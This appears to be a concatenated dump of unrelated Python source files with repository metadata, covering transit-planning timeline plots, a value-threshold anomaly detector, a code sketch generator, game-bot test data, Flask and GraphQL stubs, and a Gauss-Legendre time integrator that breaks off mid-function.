] | 1 | 2018-08-15T06:45:46.000Z | 2018-08-15T06:45:46.000Z | from messages.SessionMessage import SessionMessage
from msg_codes import CLIENT_GET_CLOUD_HOST_RESPONSE as CLIENT_GET_CLOUD_HOST_RESPONSE
__author__ = 'Mike'
| 34.347826 | 86 | 0.698734 |
fed71aa40e24235555d670228f89196c28a60884 | 8,072 | py | Python | research/route_diversity/timeline_from_csv.py | jweckstr/journey-diversity-scripts | 7b754c5f47a77ee1d630a0b26d8ec5cf6be202ae | [
"MIT"
] | null | null | null | research/route_diversity/timeline_from_csv.py | jweckstr/journey-diversity-scripts | 7b754c5f47a77ee1d630a0b26d8ec5cf6be202ae | [
"MIT"
] | null | null | null | research/route_diversity/timeline_from_csv.py | jweckstr/journey-diversity-scripts | 7b754c5f47a77ee1d630a0b26d8ec5cf6be202ae | [
"MIT"
] | null | null | null | """
PSEUDOCODE:
Load csv to pandas
csv will be of form: city, event type, event name, year, theme_A, theme_B, theme_C...
City can contain multiple cities, separated by TBD?
Check min and max year
Open figure,
Deal with events in same year, offset a little bit?
For city in cities:tle
for event in events
"""
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
from collections import OrderedDict
from numpy import cos, sin, deg2rad, arange
from matplotlib import gridspec
from pylab import Circle
base_path = "/home/clepe/route_diversity/data/plannord_tables/"
themes_path = base_path + "themes.csv"
events_path = base_path + "events.csv"
year_length = 1
city_height = 1
size = 0.1
theme_length = 0.5
theme_width = 1
offset = 0.15
event_offset = 0.15
start_year = 2000
end_year = 2024
color_dict = {"Land use or infrastructure planning": "#66c2a5",
"Service level analysis or definitions": "#fc8d62",
"PTN plan or comparison": "#8da0cb",
"PT strategy": "#e78ac3",
"Transport system plan or strategy": "#a6d854",
'Other': "k"}
type_dict = {"Conference procedings": "Other",
'PTS whitepaper': "Other",
'Replies from hearing': "Other",
'PT authority strategy': "Other",
'PTS white paper': "Other",
'PT "product characterization"': "Other",
'Other': "Other",
"Infrastructure analysis or plan": "Land use or infrastructure planning",
"Master planning": "Land use or infrastructure planning",
"PT service level analysis": "Service level analysis or definitions",
"PT service level definitions": "Service level analysis or definitions",
"PTN comparison": "PTN plan or comparison",
"PTS plan": "PTN plan or comparison",
"PTS strategy": "PT strategy",
"Transport system plan": "Transport system plan or strategy",
"Transport system strategy": "Transport system plan or strategy"}
event_offsets = {"LRT/tram": event_offset,
"BHLS or large route overhaul": 0,
"BRT/superbus": -1 * event_offset}
event_colors = {"LRT/tram": "g",
"BHLS or large route overhaul": "#0042FF",
"BRT/superbus": "#001C6E"}
theme_angles = {"through_routes": 0, "network_simplicity": 120, "trunk_network": 240}
themes_df = pd.read_csv(themes_path)
events_df = pd.read_csv(events_path)
themes_df = themes_df[pd.notnull(themes_df['year'])]
events_df = events_df[pd.notnull(events_df['year'])]
themes_df["year"] = themes_df.apply(lambda x: clean_years(x.year), axis=1)
events_df["year"] = events_df.apply(lambda x: clean_years(x.year), axis=1)
themes_df = split_to_separate_rows(themes_df, "city", "/")
themes_df.loc[themes_df['city'] == "Fredrikstad-Sarpsborg", 'city'] = "F:stad-S:borg"
events_df.loc[events_df['city'] == "Fredrikstad-Sarpsborg", 'city'] = "F:stad-S:borg"
themes_df.loc[themes_df['city'] == "Porsgrunn-Skien", 'city'] = "P:grunn-Skien"
events_df.loc[events_df['city'] == "Porsgrunn-Skien", 'city'] = "P:grunn-Skien"
city_year_slots = {}
for i, row in themes_df[["city", "year"]].append(events_df[["city", "year"]]).iterrows():
if (row.city, row.year) in city_year_slots.keys():
city_year_slots[(row.city, row.year)] += 1
else:
city_year_slots[(row.city, row.year)] = 1
city_year_cur_slot = {key: 0 for key, value in city_year_slots.items()}
cities = [x for x in set(themes_df.city.dropna().tolist()) if "/" not in x]
cities.sort(reverse=True)
themes_df["type"] = themes_df.apply(lambda row: type_dict[row.type], axis=1)
types = [x for x in set(themes_df.type.dropna().tolist())]
fig = plt.figure()
ax1 = plt.subplot(111)
#gs = gridspec.GridSpec(1, 2, width_ratios=[1, 9])
#ax1 = plt.subplot(gs[1])
#ax2 = plt.subplot(gs[0], sharey=ax1)
"""
gs1 = gridspec.GridSpec(3, 3)
gs1.update(right=.7, wspace=0.05)
ax1 = plt.subplot(gs1[:-1, :])
ax2 = plt.subplot(gs1[-1, :-1])
ax3 = plt.subplot(gs1[-1, -1])
"""
groups = themes_df.groupby('type')
for i, row in events_df.iterrows():
e_offset = event_offsets[row.type]
c = event_colors[row.type]
y = city_height * cities.index(row.city) + e_offset
x = row.year
ax1.plot([row.year, end_year+1], [y, y], c=c, marker='o', label=row.type, zorder=2, markersize=3)
for name, group in groups:
for i, row in group.iterrows():
n_slots = city_year_slots[(row.city, row.year)]
cur_slot = city_year_cur_slot[(row.city, row.year)]
city_year_cur_slot[(row.city, row.year)] += 1
slot_offset = slot_location(n_slots, cur_slot)
y = city_height * cities.index(row.city) + slot_offset[0]
x = row.year + slot_offset[1]
if row.year < start_year:
continue
#circle = Circle((x, y), color=color_dict[name], radius=size, label=name, zorder=5)
ax1.scatter(x, y, color=color_dict[name], s=5, label=name, zorder=5) #add_patch(circle)
for theme, angle in theme_angles.items():
if pd.notnull(row[theme]):
ax1.plot([x, x + theme_length * sin(deg2rad(angle))], [y, y + theme_length * cos(deg2rad(angle))],
c=color_dict[name], zorder=10, linewidth=theme_width)
handles, labels = ax1.get_legend_handles_labels()
by_label = OrderedDict(zip(labels, handles))
#ax1.legend(by_label.values(), by_label.keys())
# TODO: add year for GTFS feed as vertical line
#ax2 = fig.add_subplot(121, sharey=ax1)
for city in cities:
y = city_height * cities.index(city)
x = end_year
ax1.text(x, y, city, horizontalalignment='left', verticalalignment='center', fontsize=10) #, bbox=dict(boxstyle="square", facecolor='white', alpha=0.5, edgecolor='white'))
ax1.plot([start_year-1, end_year+1], [y, y], c="grey", alpha=0.5, linewidth=0.1, zorder=1)
ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
ax1.set_yticks([])
ax1.set_yticklabels([])
#ax2.axis('off')
ax1.set_xlim(start_year, end_year)
ax1.set_aspect("equal")
plt.xticks(arange(start_year, end_year, 5))
plt.savefig(base_path+'timeline.pdf', format="pdf", dpi=300, bbox_inches='tight')
fig = plt.figure()
ax2 = plt.subplot(111)
ax2.legend(by_label.values(), by_label.keys(), loc='center', #bbox_to_anchor=(0.5, -0.05),
fancybox=True, shadow=True, ncol=2)
ax2.axis('off')
plt.savefig(base_path+'legend.pdf', format="pdf", dpi=300, bbox_inches='tight')
#plt.show()
# create legend for themes in a separate figure
fig = plt.figure()
ax3 = plt.subplot(111)
x = 0
y = 0
circle = Circle((x, y), color="black", radius=size, zorder=5)
ax3.add_patch(circle)
for theme, angle in theme_angles.items():
x1 = x + theme_length * sin(deg2rad(angle))
y1 = y + theme_length * cos(deg2rad(angle))
x2 = x + theme_length * sin(deg2rad(angle)) * 1.2
y2 = y + theme_length * cos(deg2rad(angle)) * 1.2
ax3.annotate(theme.capitalize().replace("_", " "), (x1, y1), (x2, y2), horizontalalignment='center',
verticalalignment='center', color="red", zorder=10, size=15)
ax3.plot([x, x1], [y, y1], c="black",
linewidth=10*theme_width, zorder=1)
ax3.set_aspect("equal")
ax3.axis('off')
plt.savefig(base_path+'timeline_themes.pdf', format="pdf", dpi=300, bbox_inches='tight')
| 35.559471 | 175 | 0.650768 |
fed7cf7a07873e74fd5bc50796d61484b796fe97 | 2,012 | py | Python | bevm/db.py | sorawit/bevm | 850b2d64fc12dae92d9cdaf8b4c48b90cc0d05d6 | [
"MIT"
] | 1 | 2021-09-15T10:16:46.000Z | 2021-09-15T10:16:46.000Z | bevm/db.py | sorawit/bevm | 850b2d64fc12dae92d9cdaf8b4c48b90cc0d05d6 | [
"MIT"
] | null | null | null | bevm/db.py | sorawit/bevm | 850b2d64fc12dae92d9cdaf8b4c48b90cc0d05d6 | [
"MIT"
] | null | null | null | from eth.db.atomic import AtomicDB
from eth.db.backends.level import LevelDB
from eth.db.account import AccountDB
from rlp.sedes import big_endian_int
from bevm.block import Block
from bevm.action import rlp_decode_action
ACTION_COUNT = b'BEVM:ACTION_COUNT'
| 32.983607 | 77 | 0.700795 |
fed896e00f41aed0c3e19962de5fce02825adb90 | 2,408 | py | Python | api/ops/tasks/detection/core/detectionTypes/valueThreshold.py | LeiSoft/CueObserve | cc5254df7d0cb817a8b3ec427f5cb54a1d420f7e | [
"Apache-2.0"
] | 149 | 2021-07-16T13:37:30.000Z | 2022-03-21T10:13:15.000Z | api/ops/tasks/detection/core/detectionTypes/valueThreshold.py | LeiSoft/CueObserve | cc5254df7d0cb817a8b3ec427f5cb54a1d420f7e | [
"Apache-2.0"
] | 61 | 2021-07-15T06:39:05.000Z | 2021-12-27T06:58:10.000Z | api/ops/tasks/detection/core/detectionTypes/valueThreshold.py | LeiSoft/CueObserve | cc5254df7d0cb817a8b3ec427f5cb54a1d420f7e | [
"Apache-2.0"
] | 22 | 2021-07-19T07:20:49.000Z | 2022-03-21T10:13:16.000Z | import dateutil.parser as dp
from dateutil.relativedelta import relativedelta
import pandas as pd, datetime as dt
def checkLatestAnomaly(df, operationCheckStr):
"""
Looks up latest anomaly in dataframe
"""
anomalies = df[df["anomaly"] == 15]
if anomalies.shape[0] > 0:
lastAnomalyRow = anomalies.iloc[-1]
anomalyTime = lastAnomalyRow["ds"]
return {
"operationCheck": operationCheckStr,
"value": float(lastAnomalyRow["y"]),
"anomalyTimeISO": dp.parse(anomalyTime).isoformat(),
"anomalyTime": dp.parse(anomalyTime).timestamp() * 1000,
}
return {}
def valueThresholdDetect(df, granularity, operator, value1, value2):
"""
Method to perform anomaly detection on given dataframe
"""
value1 = int(value1)
lowerVal = value1
upperVal = value1
if value2 != "null":
value2 = int(value2)
lowerVal = min(value1, value2)
upperVal = max(value1, value2)
operationStrDict = {
"greater": f'greater than {value1}',
"lesser": f'lesser than {value1}',
"!greater": f'not greater than {value1}',
"!lesser": f'not lesser than {value1}',
"between": f'between {lowerVal} and {upperVal}',
"!between": f'not between {lowerVal} and {upperVal}'
}
operationDict = {
"greater": '(df["y"] > value1) * 14 + 1',
"lesser": '(df["y"] < value1) * 14 + 1',
"!greater": '(df["y"] <= value1) * 14 + 1',
"!lesser": '(df["y"] >= value1) * 14 + 1',
"between": '((df["y"] >= lowerVal) & (df["y"] <= upperVal)) * 14 + 1',
"!between": '((df["y"] < lowerVal) | (df["y"] > upperVal)) * 14 + 1'
}
today = dt.datetime.now()
df["ds"] = pd.to_datetime(df["ds"])
df = df.sort_values("ds")
df["ds"] = df["ds"].apply(lambda date: date.isoformat()[:19])
todayISO = today.replace(hour=0, minute=0, second=0, microsecond=0, tzinfo=None).isoformat()[:19]
df = df[df["ds"] < todayISO]
df["anomaly"] = eval(operationDict[operator])
anomalyLatest = checkLatestAnomaly(df, operationStrDict[operator])
df = df[["ds", "y", "anomaly"]]
numActual = 45 if granularity == "day" else 24 * 7
output = {
"anomalyData": {
"actual": df[-numActual:].to_dict("records")
},
"anomalyLatest": anomalyLatest
}
return output | 35.411765 | 101 | 0.572674 |
fed8e9ad56ccf5ea28b13fbec8dee05b0037dc77 | 343 | py | Python | src/chapter8/exercise6.py | group7BSE1/BSE-2021 | 2553b12e5fd5d1015af4746bcf84a8ee7c1cb8e0 | [
"MIT"
] | null | null | null | src/chapter8/exercise6.py | group7BSE1/BSE-2021 | 2553b12e5fd5d1015af4746bcf84a8ee7c1cb8e0 | [
"MIT"
] | null | null | null | src/chapter8/exercise6.py | group7BSE1/BSE-2021 | 2553b12e5fd5d1015af4746bcf84a8ee7c1cb8e0 | [
"MIT"
] | 1 | 2021-04-07T14:49:04.000Z | 2021-04-07T14:49:04.000Z | list = []
while True:
number = 0.0
input_num = input('Enter a number: ')
if input_num == 'done':
break
try:
number = float(input_num)
except:
print('Invalid input')
quit()
list.append(input_num)
if list:
print('Maximum: ', max(list) or None)
print('Minimum: ', min(list) or None) | 22.866667 | 41 | 0.559767 |
fed8fa9a87db15241481aa01020912d1d1d9aa17 | 91 | py | Python | client/const.py | math2001/nine43 | 7749dc63b9717a6ee4ddc1723d6c59e16046fc01 | [
"MIT"
] | null | null | null | client/const.py | math2001/nine43 | 7749dc63b9717a6ee4ddc1723d6c59e16046fc01 | [
"MIT"
] | 3 | 2019-04-27T06:34:34.000Z | 2019-04-27T21:29:31.000Z | client/const.py | math2001/nine43 | 7749dc63b9717a6ee4ddc1723d6c59e16046fc01 | [
"MIT"
] | null | null | null | MONO = "FiraMono-Medium"
PORT = 9999
ISSUES = "https://github.com/math2001/nine43/issues"
| 18.2 | 52 | 0.725275 |
fed91e7ac94b5be8280a7f183dba3afc80ab32c6 | 484 | py | Python | zipencrypt/__init__.py | norcuni/zipencrypt | 897f03d05f5b2881e915ed346d0498f58abf3ac8 | [
"MIT"
] | 5 | 2018-06-05T18:57:10.000Z | 2020-12-04T10:08:31.000Z | zipencrypt/__init__.py | norcuni/zipencrypt | 897f03d05f5b2881e915ed346d0498f58abf3ac8 | [
"MIT"
] | 2 | 2018-11-07T02:53:40.000Z | 2019-10-30T20:48:40.000Z | zipencrypt/__init__.py | devthat/zipencrypt | 897f03d05f5b2881e915ed346d0498f58abf3ac8 | [
"MIT"
] | null | null | null | import sys
PY2 = sys.version_info[0] == 2
if PY2:
from .zipencrypt2 import ZipFile
from zipfile import BadZipfile, error, ZIP_STORED, ZIP_DEFLATED, \
is_zipfile, ZipInfo, PyZipFile, LargeZipFile
__all__ = ["BadZipfile", "error", "ZIP_STORED", "ZIP_DEFLATED",
"is_zipfile", "ZipInfo", "ZipFile", "PyZipFile", "LargeZipFile"]
else:
from .zipencrypt3 import __all__ as zipencrypt3_all
from .zipencrypt3 import *
__all__ = zipencrypt3_all
| 32.266667 | 79 | 0.692149 |
fed9bd2808591485831ae3b90b08dc959af84228 | 19 | py | Python | deprecated/origin_stgcn_repo/feeder/__init__.py | fserracant/mmskeleton | 44008bdef3dd6354a17c220fac8bcd8cd08ed201 | [
"Apache-2.0"
] | 2,302 | 2018-01-23T11:18:30.000Z | 2022-03-31T12:24:55.000Z | deprecated/origin_stgcn_repo/feeder/__init__.py | fserracant/mmskeleton | 44008bdef3dd6354a17c220fac8bcd8cd08ed201 | [
"Apache-2.0"
] | 246 | 2019-08-24T15:36:11.000Z | 2022-03-23T06:57:02.000Z | deprecated/origin_stgcn_repo/feeder/__init__.py | fserracant/mmskeleton | 44008bdef3dd6354a17c220fac8bcd8cd08ed201 | [
"Apache-2.0"
] | 651 | 2018-01-24T00:56:54.000Z | 2022-03-25T23:42:53.000Z | from . import tools | 19 | 19 | 0.789474 |
feda36d66368a5ba3e059121a70717771426dc48 | 138 | py | Python | nifs/retrieve/rawdata/__init__.py | nifs-software/nifs-retrieve | 4ff9d70a1d2301d7b5762162586388ae67046ad2 | [
"MIT"
] | null | null | null | nifs/retrieve/rawdata/__init__.py | nifs-software/nifs-retrieve | 4ff9d70a1d2301d7b5762162586388ae67046ad2 | [
"MIT"
] | 2 | 2021-12-16T04:50:00.000Z | 2021-12-22T11:55:01.000Z | nifs/retrieve/rawdata/__init__.py | nifs-software/nifs-retrieve | 4ff9d70a1d2301d7b5762162586388ae67046ad2 | [
"MIT"
] | null | null | null | from .rawdata import RawData
from .timedata import TimeData
from .voltdata import VoltData
__all__ = ["RawData", "TimeData", "VoltData"]
| 23 | 45 | 0.768116 |
fedb6c7eea105f52852855900c26c30796b4a06e | 5,654 | py | Python | preprocess/sketch_generation.py | code-gen/exploration | c83d79745df9566c5f1a82e581008e0984fcc319 | [
"MIT"
] | null | null | null | preprocess/sketch_generation.py | code-gen/exploration | c83d79745df9566c5f1a82e581008e0984fcc319 | [
"MIT"
] | 1 | 2019-05-11T14:49:58.000Z | 2019-05-24T15:02:54.000Z | preprocess/sketch_generation.py | code-gen/exploration | c83d79745df9566c5f1a82e581008e0984fcc319 | [
"MIT"
] | null | null | null | """
Sketch (similar to Coarse-to-Fine)
- keep Python keywords as is
- strip off arguments and variable names
- substitute tokens with types: `NUMBER`, `STRING`
- specialize `NAME` token:
- for functions: `FUNC#<num_args>`
# Examples
x = 1 if True else 0
NAME = NUMBER if True else NUMBER
result = SomeFunc(1, 2, 'y', arg)
NAME = FUNC#4 ( NUMBER , NUMBER , STRING , NAME )
result = [x for x in DoWork(xs) if x % 2 == 0]
NAME = [ NAME for NAME in FUNC#1 ( NAME ) if NAME % NUMBER == NUMBER ]
"""
import ast
import builtins
import io
import sys
import token
from collections import defaultdict
from tokenize import TokenInfo, tokenize
import astpretty
from termcolor import colored
def main():
# v = ASTVisitor()
# t = v.visit(ast.parse('x = SomeFunc(2, 3, y, "test")'))
# print(v.functions)
# astpretty.pprint(tree.body[0], indent=' ' * 4)
# exec(compile(tree, filename="<ast>", mode="exec"))
code_snippet = sys.argv[1]
astpretty.pprint(ast.parse(code_snippet).body[0], indent=' ' * 4)
sketch = Sketch(code_snippet, verbose=True).generate()
# print(sketch.details())
print(sketch)
if __name__ == '__main__':
main()
| 29.447917 | 105 | 0.579413 |
fedbf772bab9d4ac688fa0669b5207dce247b24c | 8,538 | py | Python | LPBv2/tests/game/test_player.py | TierynnB/LeaguePyBot | 2e96230b9dc24d185ddc0c6086d79f7d01e7a643 | [
"MIT"
] | 45 | 2020-11-28T04:45:45.000Z | 2022-03-31T05:53:37.000Z | LPBv2/tests/game/test_player.py | TierynnB/LeaguePyBot | 2e96230b9dc24d185ddc0c6086d79f7d01e7a643 | [
"MIT"
] | 13 | 2021-01-15T00:50:10.000Z | 2022-02-02T15:16:49.000Z | LPBv2/tests/game/test_player.py | TierynnB/LeaguePyBot | 2e96230b9dc24d185ddc0c6086d79f7d01e7a643 | [
"MIT"
] | 14 | 2020-12-21T10:03:31.000Z | 2021-11-22T04:03:03.000Z | import pytest
from LPBv2.common import (
InventoryItem,
PlayerInfo,
PlayerScore,
PlayerStats,
TeamMember,
MinimapZone,
merge_dicts,
)
from LPBv2.game import Player
update_data = {
"abilities": {
"E": {
"abilityLevel": 0,
"displayName": "\u9b42\u306e\u8a66\u7df4",
"id": "IllaoiE",
"rawDescription": "GeneratedTip_Spell_IllaoiE_Description",
"rawDisplayName": "GeneratedTip_Spell_IllaoiE_DisplayName",
},
"Passive": {
"displayName": "\u65e7\u795e\u306e\u9810\u8a00\u8005",
"id": "IllaoiPassive",
"rawDescription": "GeneratedTip_Passive_IllaoiPassive_Description",
"rawDisplayName": "GeneratedTip_Passive_IllaoiPassive_DisplayName",
},
"Q": {
"abilityLevel": 0,
"displayName": "\u89e6\u624b\u306e\u9244\u69cc",
"id": "IllaoiQ",
"rawDescription": "GeneratedTip_Spell_IllaoiQ_Description",
"rawDisplayName": "GeneratedTip_Spell_IllaoiQ_DisplayName",
},
"R": {
"abilityLevel": 0,
"displayName": "\u4fe1\u4ef0\u9707",
"id": "IllaoiR",
"rawDescription": "GeneratedTip_Spell_IllaoiR_Description",
"rawDisplayName": "GeneratedTip_Spell_IllaoiR_DisplayName",
},
"W": {
"abilityLevel": 0,
"displayName": "\u904e\u9177\u306a\u308b\u6559\u8a13",
"id": "IllaoiW",
"rawDescription": "GeneratedTip_Spell_IllaoiW_Description",
"rawDisplayName": "GeneratedTip_Spell_IllaoiW_DisplayName",
},
},
"championStats": {
"abilityHaste": 0.0,
"abilityPower": 0.0,
"armor": 41.0,
"armorPenetrationFlat": 0.0,
"armorPenetrationPercent": 1.0,
"attackDamage": 73.4000015258789,
"attackRange": 125.0,
"attackSpeed": 0.5709999799728394,
"bonusArmorPenetrationPercent": 1.0,
"bonusMagicPenetrationPercent": 1.0,
"cooldownReduction": 0.0,
"critChance": 0.0,
"critDamage": 175.0,
"currentHealth": 601.0,
"healthRegenRate": 1.899999976158142,
"lifeSteal": 0.0,
"magicLethality": 0.0,
"magicPenetrationFlat": 0.0,
"magicPenetrationPercent": 1.0,
"magicResist": 32.0,
"maxHealth": 601.0,
"moveSpeed": 340.0,
"physicalLethality": 0.0,
"resourceMax": 300.0,
"resourceRegenRate": 1.5,
"resourceType": "MANA",
"resourceValue": 300.0,
"spellVamp": 0.0,
"tenacity": 0.0,
},
"currentGold": 888.6270751953125,
"level": 1,
"summonerName": "Supername",
"championName": "\u30a4\u30e9\u30aa\u30a4",
"isBot": False,
"isDead": False,
"items": [
{
"canUse": False,
"consumable": False,
"count": 1,
"displayName": "\u92fc\u306e\u30b7\u30e7\u30eb\u30c0\u30fc\u30ac\u30fc\u30c9",
"itemID": 3854,
"price": 400,
"rawDescription": "GeneratedTip_Item_3854_Description",
"rawDisplayName": "Item_3854_Name",
"slot": 0,
},
{
"canUse": False,
"consumable": False,
"count": 1,
"displayName": "\u30d7\u30ec\u30fc\u30c8 \u30b9\u30c1\u30fc\u30eb\u30ad\u30e3\u30c3\u30d7",
"itemID": 3047,
"price": 500,
"rawDescription": "GeneratedTip_Item_3047_Description",
"rawDisplayName": "Item_3047_Name",
"slot": 1,
},
{
"canUse": False,
"consumable": False,
"count": 1,
"displayName": "\u30ad\u30f3\u30c9\u30eb\u30b8\u30a7\u30e0",
"itemID": 3067,
"price": 400,
"rawDescription": "GeneratedTip_Item_3067_Description",
"rawDisplayName": "Item_3067_Name",
"slot": 2,
},
{
"canUse": True,
"consumable": False,
"count": 1,
"displayName": "\u30b9\u30c6\u30eb\u30b9 \u30ef\u30fc\u30c9",
"itemID": 3340,
"price": 0,
"rawDescription": "GeneratedTip_Item_3340_Description",
"rawDisplayName": "Item_3340_Name",
"slot": 6,
},
],
"position": "",
"rawChampionName": "game_character_displayname_Illaoi",
"respawnTimer": 0.0,
"runes": {
"keystone": {
"displayName": "\u4e0d\u6b7b\u8005\u306e\u63e1\u6483",
"id": 8437,
"rawDescription": "perk_tooltip_GraspOfTheUndying",
"rawDisplayName": "perk_displayname_GraspOfTheUndying",
},
"primaryRuneTree": {
"displayName": "\u4e0d\u6ec5",
"id": 8400,
"rawDescription": "perkstyle_tooltip_7204",
"rawDisplayName": "perkstyle_displayname_7204",
},
"secondaryRuneTree": {
"displayName": "\u9b54\u9053",
"id": 8200,
"rawDescription": "perkstyle_tooltip_7202",
"rawDisplayName": "perkstyle_displayname_7202",
},
},
"scores": {
"assists": 0,
"creepScore": 100,
"deaths": 0,
"kills": 0,
"wardScore": 0.0,
},
"skinID": 0,
"summonerSpells": {
"summonerSpellOne": {
"displayName": "\u30af\u30ec\u30f3\u30ba",
"rawDescription": "GeneratedTip_SummonerSpell_SummonerBoost_Description",
"rawDisplayName": "GeneratedTip_SummonerSpell_SummonerBoost_DisplayName",
},
"summonerSpellTwo": {
"displayName": "\u30a4\u30b0\u30be\u30fc\u30b9\u30c8",
"rawDescription": "GeneratedTip_SummonerSpell_SummonerExhaust_Description",
"rawDisplayName": "GeneratedTip_SummonerSpell_SummonerExhaust_DisplayName",
},
},
"team": "ORDER",
}
test_zone = MinimapZone(x=90, y=90, name="TestZone")
test_member = TeamMember(x=100, y=100, zone=test_zone)
| 33.093023 | 103 | 0.613844 |
fedcf036c6fb8965eea9548fe948c1a18ef9db31 | 785 | py | Python | seiketsu/users/schema.py | tychota/seiketsu | 2b5280365b9de44cd84ac65ed74981b30be5cc76 | [
"MIT"
] | null | null | null | seiketsu/users/schema.py | tychota/seiketsu | 2b5280365b9de44cd84ac65ed74981b30be5cc76 | [
"MIT"
] | null | null | null | seiketsu/users/schema.py | tychota/seiketsu | 2b5280365b9de44cd84ac65ed74981b30be5cc76 | [
"MIT"
] | null | null | null | # cookbook/ingredients/schema.py
import graphene
from graphene_django_extras import DjangoObjectField, DjangoFilterPaginateListField, LimitOffsetGraphqlPagination
from .types import UserType
from .mutations import UserSerializerMutation
from .subscriptions import UserSubscription
| 34.130435 | 113 | 0.831847 |
fedd8583c4097da76284324d87da760d236bb283 | 1,026 | py | Python | app/__init__.py | alineayumi/desafio-ton-API-REST | cf9f88adc4f7de6060f2c3f2c31147077c311ce9 | [
"MIT"
] | null | null | null | app/__init__.py | alineayumi/desafio-ton-API-REST | cf9f88adc4f7de6060f2c3f2c31147077c311ce9 | [
"MIT"
] | null | null | null | app/__init__.py | alineayumi/desafio-ton-API-REST | cf9f88adc4f7de6060f2c3f2c31147077c311ce9 | [
"MIT"
] | null | null | null | import os
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask.logging import default_handler
from flask_request_id_header.middleware import RequestID
from app.resources.encoders import CustomJSONEncoder
from app.resources.logger import formatter
from flask_jwt import JWT
db = SQLAlchemy()
| 26.307692 | 86 | 0.789474 |
fee0850f728247adf6624bff53382da94eff6965 | 1,199 | py | Python | tests/test_negate_with_undo.py | robobeaver6/hier_config | efd413ef709d462effe8bfd11ef0520c1d62eb33 | [
"MIT"
] | null | null | null | tests/test_negate_with_undo.py | robobeaver6/hier_config | efd413ef709d462effe8bfd11ef0520c1d62eb33 | [
"MIT"
] | null | null | null | tests/test_negate_with_undo.py | robobeaver6/hier_config | efd413ef709d462effe8bfd11ef0520c1d62eb33 | [
"MIT"
] | null | null | null | import unittest
import tempfile
import os
import yaml
import types
from hier_config import HConfig
from hier_config.host import Host
if __name__ == "__main__":
unittest.main(failfast=True)
| 30.74359 | 101 | 0.692244 |
fee18a5b11572b38d902059c0db310b2cf42cd2d | 6,984 | py | Python | code/gauss_legendre.py | MarkusLohmayer/master-thesis-code | b107d1b582064daf9ad4414e1c9f332ef0be8660 | [
"MIT"
] | 1 | 2020-11-14T15:56:07.000Z | 2020-11-14T15:56:07.000Z | code/gauss_legendre.py | MarkusLohmayer/master-thesis-code | b107d1b582064daf9ad4414e1c9f332ef0be8660 | [
"MIT"
] | null | null | null | code/gauss_legendre.py | MarkusLohmayer/master-thesis-code | b107d1b582064daf9ad4414e1c9f332ef0be8660 | [
"MIT"
] | null | null | null | """Gauss-Legendre collocation methods for port-Hamiltonian systems"""
import sympy
import numpy
import math
from newton import newton_raphson, DidNotConvergeError
from symbolic import eval_expr
def butcher(s):
"""Compute the Butcher tableau for a Gauss-Legendre collocation method.
Parameters
----------
s : int
Number of stages of the collocation method.
The resulting method is of order 2s.
Returns
-------
a : numpy.ndarray
Coefficients a_{ij}, i.e. the j-th lagrange polynomial integrated on (0, c_i).
b : numpy.ndarray
Coefficients b_j, i.e. the the i-th lagrange polynomial integrated on (0, 1).
c : numpy.ndarray
Coefficients c_i, i.e. the collocation points.
"""
from sympy.abc import tau, x
# shifted Legendre polynomial of order s
P = (x ** s * (x - 1) ** s).diff(x, s)
# roots of P
C = sympy.solve(P)
C.sort()
c = numpy.array([float(c_i) for c_i in C])
# Lagrange basis polynomials at nodes C
L = []
for i in range(s):
l = 1
for j in range(s):
if j != i:
l = (l * (tau - C[j]) / (C[i] - C[j])).simplify()
L.append(l)
# integrals of Lagrange polynomials
A = [[sympy.integrate(l, (tau, 0, c_i)) for l in L] for c_i in C]
a = numpy.array([[float(a_ij) for a_ij in row] for row in A])
B = [sympy.integrate(l, (tau, 0, 1)) for l in L]
b = numpy.array([float(b_j) for b_j in B])
return a, b, c
def gauss_legendre(
x,
xdot,
x_0,
t_f,
dt,
s=1,
functionals={},
params={},
tol=1e-9,
logger=None,
constraints=[],
):
"""Integrate a port-Hamiltonian system in time
based on a Gauss-Legendre collocation method.
Parameters
----------
x : sympy.Matrix
vector of symbols for state-space coordinates
xdot : List[sympy.Expr]
The right hand sides of the differtial equations
which have to hold at each collocation point.
x_0 : numpy.ndarray
Initial conditions.
t_f : float
Length of time interval.
dt : float
Desired time step.
s : int
Number of stages of the collocation method.
The resulting method is of order 2s.
functionals : Dict[sympy.Symbol, sympy.Expr]
Functionals on which xdot may depend.
params : Dict[sympy.Symbol, Union[sympy.Expr, float]]
Parameters on which the system may depend.
logger : Optional[Logger]
Logger object which is passed through to Newton-Raphsopn solver.
constraints : List[sympy.Expr]
Additional algebraic equations which have to hold
at each collocation point.
"""
# number of steps
K = int(t_f // dt)
# accurate time step
dt = t_f / K
# dimension of state space
N = len(x)
# Butcher tableau (multiplied with time step)
a, b, c = butcher(s)
a *= dt
b *= dt
c *= dt
# generate code for evaluating residuals vector and Jacobian matrix
code = _generate_code(x, xdot, N, a, s, functionals, params, constraints)
# print(code)
# return None, None
ldict = {}
exec(code, None, ldict)
compute_residuals = ldict["compute_residuals"]
compute_jacobian = ldict["compute_jacobian"]
del code, ldict
# array for storing time at every step
time = numpy.empty(K + 1, dtype=float)
time[0] = t_0 = 0.0
# array for storing the state at every step
solution = numpy.empty((K + 1, N), dtype=float)
solution[0] = x_0
# flows / unknowns (reused at every step)
f = numpy.zeros(s * N, dtype=float)
fmat = f.view()
fmat.shape = (s, N)
# residuals vector (reused at every step)
residuals = numpy.empty(s * (N + len(constraints)), dtype=float)
# jacobian matrix (reused at every step)
jacobian = numpy.empty((s * (N + len(constraints)), s * N), dtype=float)
for k in range(1, K + 1):
try:
newton_raphson(
f,
residuals,
lambda residuals, unknowns: compute_residuals(residuals, unknowns, x_0),
jacobian,
lambda jacobian, unknowns: compute_jacobian(jacobian, unknowns, x_0),
tol=tol,
iterations=500,
logger=logger,
)
except DidNotConvergeError:
print(f"Did not converge at step {k}.")
break
time[k] = t_0 = t_0 + dt
solution[k] = x_0 = x_0 - b @ fmat
return time, solution
def _generate_code(x, xdot, N, a, s, functionals, params, constraints):
"""Generate code for the two methods compute_residuals and compute_jacobian"""
# dynamics
xdot = [eval_expr(f, functionals) for f in xdot]
# algebraic constraints
constraints = [eval_expr(c, functionals) for c in constraints]
# symbols for Butcher coefficients a_{ij} multiplied by time step h
asym = [[sympy.Symbol(f"a{i}{j}") for j in range(s)] for i in range(s)]
# symbols for old state
osym = [sympy.Symbol(f"o[{n}]") for n in range(N)]
# symbols for unknowns (flow vector)
